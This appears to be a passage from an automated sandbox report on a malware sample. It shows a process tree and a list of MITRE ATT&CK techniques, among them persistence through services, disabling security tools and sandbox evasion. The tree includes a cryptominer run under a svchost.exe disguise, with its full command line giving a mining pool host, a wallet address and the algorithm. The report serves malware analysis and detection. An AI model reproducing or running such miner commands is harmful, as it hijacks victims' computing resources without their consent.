- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 900
    3⤵
    - Runs ping.exe
    PID:10200

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7680

C:\Windows\SysWOW64\yrwnhwyt\fjmiudaw.exe
C:\Windows\SysWOW64\yrwnhwyt\fjmiudaw.exe /d"C:\Users\Admin\AppData\Local\Temp\47E7.exe"
1⤵
PID:7324
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:7748
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:7904

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10796

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5944

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7752

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7784

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:3484
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:10772

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9024

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3916

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:11024

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9092

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9672

C:\Users\Admin\AppData\Local\Temp\4131.exe
C:\Users\Admin\AppData\Local\Temp\4131.exe
1⤵
PID:9976

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10068

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2764

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4972

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10832

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1416

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:9292

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:7396

C:\Users\Admin\AppData\Roaming\sidchgs
C:\Users\Admin\AppData\Roaming\sidchgs
1⤵
PID:2380

C:\Users\Admin\AppData\Roaming\wudchgs
C:\Users\Admin\AppData\Roaming\wudchgs
1⤵
PID:4996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7724

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6944

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:11036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9676

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10572

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:10068

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7136

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9968

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery